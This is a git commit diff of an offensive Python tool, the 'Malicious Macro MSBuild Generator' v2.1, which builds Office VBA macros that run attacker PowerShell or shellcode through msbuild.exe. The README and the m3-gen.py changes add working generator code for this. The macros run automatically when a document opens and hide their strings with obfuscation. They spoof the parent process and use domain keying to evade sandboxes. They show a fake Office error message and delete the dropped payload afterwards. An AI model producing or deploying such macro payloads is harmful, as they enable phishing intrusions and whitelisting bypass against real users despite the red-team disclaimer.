Update MaliciousMacroMSBuild v2.1

master
root 2019-08-04 00:08:22 -04:00
parent d1996b52d0
commit b42759339d
3 changed files with 129 additions and 53 deletions

View File

@ -1,21 +1,26 @@
# Malicious Macro MSBuild Generator 2.0
# Malicious Macro MSBuild Generator v2.1
## Description
Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass, this tool intended for adversary simulation and red teaming purpose.
## What is MSBuild
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.
MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.
## Disclaimer
> MaliciousMacroMSBuild should be used for authorized red teaming and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
## Changelog
* Added Option Macro AMSI Bypass (Thanks to outflank team)
* Added PPID Spoofing {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
* Added functionality auto removed csproj payload after execution
* Added custom msbuild option
```
Version 2.1
-----------
+ Added sandbox evasion technique using environmental keying domain checking
+ Added Kill Date format dd/mm/yyyy [28/02/2018]
+ Move payload from public user to current user download folder
Version 2.0
-----------
+ Added Option Macro AMSI Bypass (Thanks to outflank team)
+ Added PPID Spoofing {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
+ Added functionality auto removed csproj payload after execution
+ Added custom msbuild option
```
## Usage
```
@ -31,32 +36,49 @@ MSBuild will compile and execute the inline task. MSBuild.exe is a signed Micros
Malicious Macro MSBuild Generator v2.0
Author : Rahmat Nurfauzi (@infosecn1nja)
usage: m3-gen.py [-h] -i INPUTFILE -p PAYLOAD -o OUTPUT [-a]
usage: m3-gen.py [-h] -i INPUTFILE -p PAYLOAD -o OUTPUT [-a] [-d DOMAIN]
[-k KILL_DATE]
optional arguments:
-h, --help show this help message and exit
-i INPUTFILE, --inputfile INPUTFILE
Input file you want to embed into the macro
-p PAYLOAD, --payload PAYLOAD
Choose a payload for powershell or raw shellcode
Choose a payload for powershell, raw shellcode or custom
-o OUTPUT, --output OUTPUT
Output filename for the macro
-a, --amsi_bypass Macro AMSI Bypass Execute via ms office trusted location
-d DOMAIN, --domain DOMAIN
Sandbox evasion technique using environmental keying domain checking. Use comma separating to set multiple domains
-k KILL_DATE, --kill_date KILL_DATE
Set kill date format dd/MM/yyyy the payload do not run on or after this day
```
## Example
* Choose a payload you want to test like shellcode or powershell
* Generate a raw shellcode in whatever framework you want (Cobalt Strike, Metasploit Framework)
## Examples
* Choose a payload you want to test like shellcode or powershell, the shellcode support stageless and staged payload
* Generate a raw shellcode in whatever framework you want (Cobalt Strike, Empire, PoshC2)
`$ msfvenom -p windows/exec cmd="calc.exe" -f raw > payload.bin`
`$ python M3G.py -p shellcode -i /path/payload.bin -o macro.vba`
`$ python M3G.py -p powershell -i /path/payload.ps1 -o macro.vba`
### Creation of a Shellcode MSBuild VBA Macro
`python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba`
### Creation of a PowerShell MSBuild VBA Macro
`python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba`
### Creation of a Custom MSBuild VBA Macro
`python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba`
### Creation of a Shellcode MSBuild VBA Macro With Kill Date
`python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018`
### Creation of a Shellcode MSBuild VBA Macro With Environmental Keying
* `python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain`
* `python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github`
## Links
* https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
* http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
* https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
* https://attack.mitre.org/techniques/T1127/
* https://msdn.microsoft.com/en-us/library/dd722601.aspx
## Credit
Rahmat Nurfauzi (@infosecn1nja)
## Author and Credits
Author : Rahmat Nurfauzi - [@infosecn1nja](https://twitter.com/infosecn1nja)
Credits : [@subTee](https://twitter.com/subtee) - For discovering msbuild technique

105
m3-gen.py
View File

@ -23,7 +23,7 @@ def chunks(l, n):
yield l[i:i+n]
def gen_str():
return ''.join(random.choice(string.letters) for i in range(random.randint(12,20)))
return ''.join(random.choice(string.letters) for i in range(random.randint(8,12)))
def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
@ -95,11 +95,17 @@ def generate_custom(filename):
return content
def generate_macro(msbuild_template, amsi_bypass=False):
def generate_macro(msbuild_template, amsi_bypass=False, sandbox=False, killdate=False):
Method = gen_str()
Method2 = gen_str()
Method3 = gen_str()
Str = gen_str()
Str2 = gen_str()
csproj = random.choice([
"TrackPackageWeb","DebugInfo","CoppisAdditions","BusinessLayer",
"NativeClientVSAddIn", "WikiUpdater","AuthorizeNet.Helpers",
"CreateWordDoc","TimeSeries","JUpdate","UnityImageProcessing",
"LogicLayer"])
msbuild_encoded = base64.b64encode(minimize(msbuild_template))
chunk = list(chunks(msbuild_encoded,200))
@ -117,21 +123,24 @@ def generate_macro(msbuild_template, amsi_bypass=False):
macro_str += 'End Function\n\n'
macro_str += "Sub AutoNew()\n"
macro_str += ' ' + Method
if sandbox is not None:
macro_str += ' ' + Method3
else:
macro_str += ' ' + Method
macro_str += '\nEnd Sub\n\n'
macro_str += 'Function Base64Decode(ByVal vCode)\n'
macro_str += 'Function decodeBase64(ByVal vCode)\n'
macro_str += ' Dim oXML, oNode\n'
macro_str += ' Set oXML = CreateObject("Msxml2.DOMDocument.3.0")\n'
macro_str += ' Set oNode = oXML.CreateElement("base64")\n'
macro_str += ' oNode.dataType = "bin.base64"\n'
macro_str += ' oNode.Text = vCode\n'
macro_str += ' Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)\n'
macro_str += ' decodeBase64 = sBinToStr(oNode.nodeTypedValue)\n'
macro_str += ' Set oNode = Nothing\n'
macro_str += ' Set oXML = Nothing\n'
macro_str += 'End Function\n'
macro_str += '\nPrivate Function Stream_BinaryToString(Binary)\n'
macro_str += '\nPrivate Function sBinToStr(Binary)\n'
macro_str += ' Const adTypeText = 2\n'
macro_str += ' Const adTypeBinary = 1\n'
macro_str += ' Dim BinaryStream\n'
@ -142,45 +151,81 @@ def generate_macro(msbuild_template, amsi_bypass=False):
macro_str += ' BinaryStream.Position = 0\n'
macro_str += ' BinaryStream.Type = adTypeText\n'
macro_str += ' BinaryStream.Charset = "us-ascii"\n'
macro_str += ' Stream_BinaryToString = BinaryStream.ReadText\n'
macro_str += ' sBinToStr = BinaryStream.ReadText\n'
macro_str += ' Set BinaryStream = Nothing\n'
macro_str += 'End Function\n\n'
macro_str += 'Function ' + Method + '()\n'
payload = Str+" = \"" + str(chunk[0]) + "\"\n"
payload = Str+" = StrRev(\"" + str(chunk[0])[::-1] + "\")\n"
for chk in chunk[1:]:
payload += " "+Str+" = "+Str+" + \"" + str(chk) + "\"\n"
payload += " "+Str+" = "+Str+" + StrRev(\"" + str(chk)[::-1] + "\")\n"
macro_str += ' ' + payload
macro_str += '\n Open Environ("PUBLIC") & "\Downloads" & "\{}.csproj" For Output As #1\n'.format(Str2)
macro_str += ' Print #1, Base64Decode(' + Str + ')\n'
macro_str += '\n Open Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj" For Output As #1\n'.format(csproj)
macro_str += ' Print #1, decodeBase64(' + Str + ')\n'
macro_str += ' Close #1\n\n'
macro_str += ' Delay("00:00:" & Int((20 - 1 + 1 ) * Rnd + 1))\n'
# https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3
macro_str += ' Set SW = GetObject("n" & "e" & "w" & ":" & Replace("{9BA0###597###2-F6A###8-11CF###-A44###2-00A###0C9###0A8###F3###9}","###","")).Item()\n'
macro_str += ' SW.Document.Application.ShellExecute Replace("m###s###b###u###i###l###d###.e###x###e","###",""), Environ("PUBLIC") & "\Downloads" & "\{}.csproj", WhereIs(), Null, 0\n\n'.format(Str2)
macro_str += ' Set SW = GetObject("n" & "e" & "w" & ":" & Replace("{9B###A0###597###2-F6A###8-11CF###-A44###2-00A###0C9###0A8###F3###9}","###","")).Item()\n'
macro_str += ' SW.Document.Application.ShellExecute Replace("m###s###b###u###i###l###d###.e###x###e","###",""), Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj", WhereIs(), Null, 0\n\n'.format(csproj)
macro_str += ' MsgBox "This application appears to be made on an older version of the Microsoft Office product suite. Visit https://microsoft.com for more information. [ErrorCode: 4439]", vbExclamation, "Microsoft Office Corrupt Application (Compatibility Mode)"\n\n'
macro_str += ' WaitUntil = Now() + TimeValue("00:00:15")\n'
macro_str += ' Do While Now < WaitUntil\n'
macro_str += ' Loop\n'
macro_str += ' kill Environ("PUBLIC") & "\Downloads" & "\{}.csproj"\n'.format(Str2)
macro_str += ' Delay("00:00:" & Int((10 - 1 + 1 ) * Rnd + 1))\n'
macro_str += ' Kill Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj"\n'.format(csproj)
macro_str += 'End Function\n\n'
if sandbox is not None:
macro_str += 'Function ' + Method3 + '()\n'
domains = ' + '.join(['Chr({})'.format(ord(i)) for i in sandbox.lower()])
macro_str += ' arrDomains = Split(%s, Chr(44))\n' % domains
macro_str += ' If (UBound(Filter(arrDomains, LCASE(Environ("USERDOMAIN")))) > -1) = True Then\n'
macro_str += ' ' + Method
macro_str += "\n End If\n"
macro_str += 'End Function\n\n'
if amsi_bypass == True:
Method = Method2
if sandbox is not None:
Method3 = Method2
macro_str += 'Sub Auto_Open()\n'
if killdate is not None:
macro_str += ' Dim exdate As Date\n'
macro_str += ' exdate = "%s"\n' % killdate
macro_str += ' If Date < exdate Then\n '
if sandbox is not None:
macro_str += ' ' + Method3
else:
macro_str += ' ' + Method
if killdate is not None:
macro_str += '\n End If'
macro_str += '\nEnd Sub\n\n'
macro_str += 'Sub AutoOpen()\n'
macro_str += ' ' + Method
macro_str += ' Auto_Open'
macro_str += '\nEnd Sub\n\n'
macro_str += 'Sub Workbook_Open()\n'
macro_str += ' ' + Method
macro_str += ' Auto_Open'
macro_str += '\nEnd Sub\n\n'
macro_str += 'Function StrRev(StrR as String) As String\n'
macro_str += ' For i = Len(StrR) to 1 Step-1\n'
macro_str += ' var= Mid(StrR, i, 1)\n'
macro_str += ' Rev = Rev & var\n'
macro_str += ' Next\n'
macro_str += ' StrRev = Rev\n'
macro_str += 'End Function\n\n'
macro_str += 'Function FileExists(ByVal FileToTest As String) As Boolean\n'
macro_str += ' FileExists = (Dir(FileToTest) <> "")\n'
macro_str += 'End Function\n\n'
@ -190,14 +235,20 @@ def generate_macro(msbuild_template, amsi_bypass=False):
macro_str += ' Dim needful As String\n'
macro_str += ' Dim location_pw As String\n\n'
macro_str += ' business = Replace("C:\Win###do###ws\###Micr###osof###t.NET\Fr###amewo###rk\\", "###", "")\n'
macro_str += ' needful = Replace("\ms###bu###ild.###exe", "###", "")\n\n'
macro_str += ' business = Replace("C###:\###Win###do###ws\###Micr###osof###t.NET\Fr###amewo###rk\\", "###", "")\n'
macro_str += ' needful = Replace("\###ms###bu###ild.###exe", "###", "")\n\n'
macro_str += ' If FileExists(business & "v4.0.30319\\" & needful) Then\n'
macro_str += ' location_pw = business & "v4.0.30319\\"\n'
macro_str += ' ElseIf FileExists(business & "v3.5\\" & needful) Then\n'
macro_str += ' location_pw = business & "v3.5\\"\n'
macro_str += ' End If\n'
macro_str += ' WhereIs = location_pw\n'
macro_str += 'End Function\n\n'
macro_str += 'Function Delay(time as String) As String\n'
macro_str += ' WaitUntil = Now() + TimeValue(time)\n'
macro_str += ' Do While Now < WaitUntil\n'
macro_str += ' Loop\n'
macro_str += 'End Function'
return macro_str
@ -219,7 +270,7 @@ def banner():
| $$ \/ | $$| $$$$$$/| $$$$$$/
|__/ |__/ \______/ \______/
Malicious Macro MSBuild Generator v2.0
Malicious Macro MSBuild Generator v2.1
Author : Rahmat Nurfauzi (@infosecn1nja)
"""
@ -232,6 +283,8 @@ if __name__ == "__main__":
parser.add_argument('-p','--payload', help='Choose a payload for powershell, raw shellcode or custom', required=True)
parser.add_argument('-o','--output', help='Output filename for the macro', required=True)
parser.add_argument('-a','--amsi_bypass', help='Macro AMSI Bypass Execute via ms office trusted location', action='store_true')
parser.add_argument('-d','--domain', help=' Sandbox evasion technique using environmental keying domain checking. Use comma separating to set multiple domains')
parser.add_argument('-k','--kill_date', help='Set kill date format [dd/MM/yyyy] the payload do not run on or after this day')
args = parser.parse_args()
@ -239,6 +292,8 @@ if __name__ == "__main__":
payload = args.payload
output = args.output
amsi_bypass = args.amsi_bypass
domain = args.domain
killdate = args.kill_date
msbuild_payload = ''
@ -254,6 +309,6 @@ if __name__ == "__main__":
if msbuild_payload != '':
print "[*] Writing msbuild {} payload.".format(payload)
macro = generate_macro(msbuild_payload, amsi_bypass)
macro = generate_macro(msbuild_payload, amsi_bypass, domain, killdate)
output_file(output,macro)
print "[*] {} macro sucessfully saved to disk.".format(output)

View File

@ -26,7 +26,6 @@
public override bool Execute()
{
Program.Main();
return true;
}
}